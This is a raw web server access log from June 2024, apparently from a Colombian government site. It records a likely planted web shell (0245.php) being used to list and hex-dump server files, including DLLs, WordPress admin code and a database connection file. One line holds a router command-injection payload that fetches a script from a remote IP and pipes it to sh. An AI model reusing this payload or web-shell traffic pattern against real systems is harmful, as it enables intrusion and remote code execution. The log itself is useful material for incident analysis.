47.128.124.9 - - [25/Jun/2024:06:21:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.124.9 - - [25/Jun/2024:06:21:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.124.9 - - [25/Jun/2024:06:21:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.124.9 - - [25/Jun/2024:06:21:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.124.9 - - [25/Jun/2024:06:21:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.124.9 - - [25/Jun/2024:06:21:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.17.19 - - [25/Jun/2024:06:21:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1649.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 839382
47.128.43.233 - - [25/Jun/2024:06:22:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.43.233 - - [25/Jun/2024:06:22:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.43.233 - - [25/Jun/2024:06:22:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.43.233 - - [25/Jun/2024:06:22:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.43.233 - - [25/Jun/2024:06:22:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.43.233 - - [25/Jun/2024:06:22:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.43.233 - - [25/Jun/2024:06:22:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.43.233 - - [25/Jun/2024:06:22:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.43.233 - - [25/Jun/2024:06:22:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.43.233 - - [25/Jun/2024:06:22:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
201.245.192.253 - - [25/Jun/2024:06:22:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.124.9 - - [25/Jun/2024:06:21:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2607.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 659158
47.128.112.150 - - [25/Jun/2024:06:22:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5C&f=install.php&ft=code&white=1 HTTP/1.1" 200 5316
47.128.43.233 - - [25/Jun/2024:06:22:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2081.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 614102
47.128.22.228 - - [25/Jun/2024:06:22:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_dll HTTP/1.1" 200 1034
47.128.22.228 - - [25/Jun/2024:06:22:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.22.228 - - [25/Jun/2024:06:22:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.22.228 - - [25/Jun/2024:06:22:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.22.228 - - [25/Jun/2024:06:22:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.22.228 - - [25/Jun/2024:06:22:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.22.228 - - [25/Jun/2024:06:22:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
216.244.66.195 - - [25/Jun/2024:06:22:48 -0500] "GET /BLA/resoluciones/AUTOS%202016/0247.pdf HTTP/1.1" 200 692704
47.128.22.228 - - [25/Jun/2024:06:22:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.22.228 - - [25/Jun/2024:06:22:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.22.228 - - [25/Jun/2024:06:22:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
40.77.167.15 - - [25/Jun/2024:06:22:57 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12724
47.128.22.228 - - [25/Jun/2024:06:22:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=mercuryh.dll&ft=info&fullhexdump=1 HTTP/1.1" 200 194610
201.245.192.253 - - [25/Jun/2024:06:23:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.22.178 - - [25/Jun/2024:06:23:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp%5C&f=start.php&ft=html&white=1 HTTP/1.1" 200 705
47.128.22.178 - - [25/Jun/2024:06:23:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/xampp.css HTTP/1.1" 404 1392
47.128.22.178 - - [25/Jun/2024:06:23:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/img/bitnami-xampp.png HTTP/1.1" 404 1392
201.245.192.253 - - [25/Jun/2024:06:23:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.244.66.195 - - [25/Jun/2024:06:23:39 -0500] "GET /BLA/resoluciones/AUTOS%202016/0255.pdf HTTP/1.1" 200 571528
47.128.38.133 - - [25/Jun/2024:06:23:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5C&f=upgrade-functions.php&ft=code&white=1 HTTP/1.1" 200 349
207.46.13.54 - - [25/Jun/2024:06:23:48 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
207.46.13.54 - - [25/Jun/2024:06:23:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css;jsessionid=-eZ8NU48EVviWeCKGQtJZkym.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
52.167.144.19 - - [25/Jun/2024:06:23:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=-eZ8NU48EVviWeCKGQtJZkym.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
52.167.144.19 - - [25/Jun/2024:06:23:53 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
40.77.167.15 - - [25/Jun/2024:06:23:57 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
40.77.167.15 - - [25/Jun/2024:06:23:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=-eZ8NU48EVviWeCKGQtJZkym.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
40.77.167.15 - - [25/Jun/2024:06:23:58 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css;jsessionid=-eZ8NU48EVviWeCKGQtJZkym.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 542
40.77.167.15 - - [25/Jun/2024:06:23:58 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=-eZ8NU48EVviWeCKGQtJZkym.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
40.77.167.15 - - [25/Jun/2024:06:23:59 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=-eZ8NU48EVviWeCKGQtJZkym.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
40.77.167.15 - - [25/Jun/2024:06:23:59 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
40.77.167.15 - - [25/Jun/2024:06:24:00 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
216.245.221.92 - - [25/Jun/2024:06:24:04 -0500] "HEAD / HTTP/1.1" 200 -
47.128.127.45 - - [25/Jun/2024:06:24:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_dll HTTP/1.1" 200 1034
47.128.127.45 - - [25/Jun/2024:06:24:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.127.45 - - [25/Jun/2024:06:24:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.127.45 - - [25/Jun/2024:06:24:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.127.45 - - [25/Jun/2024:06:24:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.127.45 - - [25/Jun/2024:06:24:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.127.45 - - [25/Jun/2024:06:24:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.127.45 - - [25/Jun/2024:06:24:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.127.45 - - [25/Jun/2024:06:24:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.127.45 - - [25/Jun/2024:06:24:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
201.245.192.253 - - [25/Jun/2024:06:24:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.16.10 - - [25/Jun/2024:06:24:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.16.10 - - [25/Jun/2024:06:24:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.16.10 - - [25/Jun/2024:06:24:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.16.10 - - [25/Jun/2024:06:24:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.16.10 - - [25/Jun/2024:06:24:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.16.10 - - [25/Jun/2024:06:24:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.16.10 - - [25/Jun/2024:06:24:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.16.10 - - [25/Jun/2024:06:24:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.16.10 - - [25/Jun/2024:06:24:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.16.10 - - [25/Jun/2024:06:24:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
216.244.66.195 - - [25/Jun/2024:06:24:26 -0500] "GET /BLA/resoluciones/AUTOS%202016/0693.pdf HTTP/1.1" 200 481987
47.128.127.45 - - [25/Jun/2024:06:24:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Csendmail%5C&f=libeay32.dll&ft=info&fullhexdump=1 HTTP/1.1" 200 1367766
66.249.66.21 - - [25/Jun/2024:06:24:42 -0500] "GET /BLA/resoluciones/AUTOS%202008/1955.pdf HTTP/1.1" 200 94747
47.128.16.10 - - [25/Jun/2024:06:24:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2099.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 659158
47.128.127.67 - - [25/Jun/2024:06:24:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.127.67 - - [25/Jun/2024:06:24:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.127.67 - - [25/Jun/2024:06:24:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.127.67 - - [25/Jun/2024:06:24:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.127.67 - - [25/Jun/2024:06:24:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_tif HTTP/1.1" 200 175
47.128.127.67 - - [25/Jun/2024:06:24:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.127.67 - - [25/Jun/2024:06:24:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.127.67 - - [25/Jun/2024:06:24:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.127.67 - - [25/Jun/2024:06:24:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.49.186 - - [25/Jun/2024:06:24:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-admin%5C&f=upgrade-functions.php&ft=code&white=1 HTTP/1.1" 200 349
47.128.127.67 - - [25/Jun/2024:06:25:01 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
216.244.66.195 - - [25/Jun/2024:06:25:07 -0500] "GET /BLA/resoluciones/AUTOS%202016/0712.pdf HTTP/1.1" 200 742176
47.128.127.67 - - [25/Jun/2024:06:24:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2000%5C&f=2000+1500-1549.tif&ft=info&fullhexdump=1 HTTP/1.1" 200 1363670
201.245.192.253 - - [25/Jun/2024:06:25:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.125.19 - - [25/Jun/2024:06:25:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.125.19 - - [25/Jun/2024:06:25:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.125.19 - - [25/Jun/2024:06:25:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.125.19 - - [25/Jun/2024:06:25:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.125.19 - - [25/Jun/2024:06:25:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.125.19 - - [25/Jun/2024:06:25:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.125.19 - - [25/Jun/2024:06:25:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.125.19 - - [25/Jun/2024:06:25:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.125.19 - - [25/Jun/2024:06:25:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.125.19 - - [25/Jun/2024:06:25:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
216.244.66.195 - - [25/Jun/2024:06:25:57 -0500] "GET /BLA/resoluciones/AUTOS%202016/0950.pdf HTTP/1.1" 200 443961
47.128.118.226 - - [25/Jun/2024:06:26:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.118.226 - - [25/Jun/2024:06:25:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&sort=3a HTTP/1.1" 200 109460
47.128.118.226 - - [25/Jun/2024:06:26:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_zip HTTP/1.1" 200 577
47.128.127.87 - - [25/Jun/2024:06:25:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5C&f=sqlnet.log&ft=info&fullhexdump=1 HTTP/1.1" 200 536399
47.128.125.19 - - [25/Jun/2024:06:25:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5311.pdf&ft=info&fullhexdump=1 HTTP/1.1" 200 836760
47.128.118.226 - - [25/Jun/2024:06:26:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_php HTTP/1.1" 200 79
201.245.192.253 - - [25/Jun/2024:06:26:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.118.226 - - [25/Jun/2024:06:26:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=arrow_ltr HTTP/1.1" 200 88
47.128.125.253 - - [25/Jun/2024:06:26:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cboletinlegal%5C&f=conex.php&ft=html&white=1 HTTP/1.1" 200 276
172.22.2.4 - - [25/Jun/2024:06:25:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [25/Jun/2024:06:26:46 -0500] "GET /BLA/resoluciones/AUTOS%202016/1299.pdf HTTP/1.1" 200 485379
47.128.125.238 - - [25/Jun/2024:06:26:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cbogotacumbredelclima%5Cwp-admin%5C&f=upgrade-functions.php&white=1 HTTP/1.1" 200 349
207.46.13.54 - - [25/Jun/2024:06:27:01 -0500] "GET /BLA/resoluciones/AUTOS%202013/1926.pdf HTTP/1.1" 200 641578
47.128.124.127 - - [25/Jun/2024:06:27:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.124.127 - - [25/Jun/2024:06:27:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_dll HTTP/1.1" 200 1034
47.128.124.127 - - [25/Jun/2024:06:27:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.124.127 - - [25/Jun/2024:06:27:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.124.127 - - [25/Jun/2024:06:27:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.124.127 - - [25/Jun/2024:06:27:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.124.127 - - [25/Jun/2024:06:27:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.124.127 - - [25/Jun/2024:06:27:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.124.127 - - [25/Jun/2024:06:27:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.124.127 - - [25/Jun/2024:06:27:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
201.245.192.253 - - [25/Jun/2024:06:27:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.124.127 - - [25/Jun/2024:06:27:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=mercuryi.dll&ft=info&fullhexdump=1 HTTP/1.1" 200 278318
216.244.66.195 - - [25/Jun/2024:06:27:30 -0500] "GET /BLA/resoluciones/AUTOS%202016/1384.pdf HTTP/1.1" 200 542400
201.245.192.253 - - [25/Jun/2024:06:27:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38832
201.245.192.253 - - [25/Jun/2024:06:27:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36860
172.22.2.4 - - [25/Jun/2024:06:25:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51561
47.128.126.164 - - [25/Jun/2024:06:27:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5Cwebdav%5C&f=x32.php&white=1 HTTP/1.1" 200 354
47.128.123.88 - - [25/Jun/2024:06:27:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5C&f=error_report.php&ft=code&white=1 HTTP/1.1" 200 1238
40.77.167.5 - - [25/Jun/2024:06:28:02 -0500] "GET /BLA/resoluciones/AUTOS%202013/1949.pdf HTTP/1.1" 200 416890
47.128.57.11 - - [25/Jun/2024:06:23:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=NuestaGente_Corresponsales.flv&ft=info&fullhexdump=1 HTTP/1.1" 200 -
216.244.66.195 - - [25/Jun/2024:06:28:09 -0500] "GET /BLA/resoluciones/AUTOS%202016/1571.pdf HTTP/1.1" 200 355904
47.128.123.85 - - [25/Jun/2024:06:28:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-admin%5Cjs%5C&f=media.min.js&ft=code&white=1 HTTP/1.1" 200 876
201.245.192.253 - - [25/Jun/2024:06:28:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.124.124 - - [25/Jun/2024:06:28:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5C&f=heartbeat.js&ft=code&white=1 HTTP/1.1" 200 7416
201.245.192.253 - - [25/Jun/2024:06:28:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.244.66.195 - - [25/Jun/2024:06:28:43 -0500] "GET /BLA/resoluciones/AUTOS%202016/1702.pdf HTTP/1.1" 200 547728
47.128.22.204 - - [25/Jun/2024:06:28:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Caccesibilidad%5C&f=tips.html&ft=code&white=1 HTTP/1.1" 200 2159
216.245.221.92 - - [25/Jun/2024:06:29:04 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [25/Jun/2024:06:29:16 -0500] "GET /BLA/resoluciones/AUTOS%202016/1884.pdf HTTP/1.1" 200 903246
201.245.192.253 - - [25/Jun/2024:06:29:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
207.46.13.130 - - [25/Jun/2024:06:29:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0603.pdf HTTP/1.1" 304 -
201.245.192.253 - - [25/Jun/2024:06:29:36 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36857
216.244.66.195 - - [25/Jun/2024:06:29:45 -0500] "GET /BLA/resoluciones/AUTOS%202016/2664.pdf HTTP/1.1" 200 564050
47.128.33.124 - - [25/Jun/2024:06:26:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cvideos%5C&f=NuestraGente_Miquitos.flv&ft=info&fullhexdump=1 HTTP/1.1" 200 30523094
216.244.66.195 - - [25/Jun/2024:06:30:14 -0500] "GET /BLA/resoluciones/AUTOS%202016/2746.pdf HTTP/1.1" 200 579346
201.245.192.253 - - [25/Jun/2024:06:30:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:06:30:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36860
216.244.66.195 - - [25/Jun/2024:06:30:40 -0500] "GET /BLA/resoluciones/AUTOS%202016/2911.pdf HTTP/1.1" 200 308511
40.77.167.15 - - [25/Jun/2024:06:30:44 -0500] "GET /BLA/resoluciones/AUTOS%202014/1767.pdf HTTP/1.1" 200 410963
216.244.66.195 - - [25/Jun/2024:06:31:06 -0500] "GET /BLA/resoluciones/AUTOS%202016/3162.pdf HTTP/1.1" 200 390317
201.245.192.253 - - [25/Jun/2024:06:31:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [25/Jun/2024:06:31:30 -0500] "GET /BLA/resoluciones/AUTOS%202011/3860.pdf HTTP/1.1" 200 220543
216.244.66.195 - - [25/Jun/2024:06:31:54 -0500] "GET /BLA/resoluciones/AUTOS%202016/0002.pdf HTTP/1.1" 200 579180
201.245.192.253 - - [25/Jun/2024:06:32:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
185.191.127.212 - - [25/Jun/2024:06:32:24 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
172.22.2.4 - - [25/Jun/2024:06:30:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.20 - - [25/Jun/2024:06:32:33 -0500] "GET /portel_dama/libreria/php/2006/restauracion/55_artic/xtras/2.pdf HTTP/1.1" 404 1018
201.245.192.253 - - [25/Jun/2024:06:33:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [25/Jun/2024:06:31:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59967
172.22.2.4 - - [25/Jun/2024:06:33:31 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
201.245.192.253 - - [25/Jun/2024:06:33:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [25/Jun/2024:06:34:04 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [25/Jun/2024:06:34:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:06:35:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [25/Jun/2024:06:36:17 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
162.55.173.23 - - [25/Jun/2024:06:36:19 -0500] "GET / HTTP/1.1" 200 4720
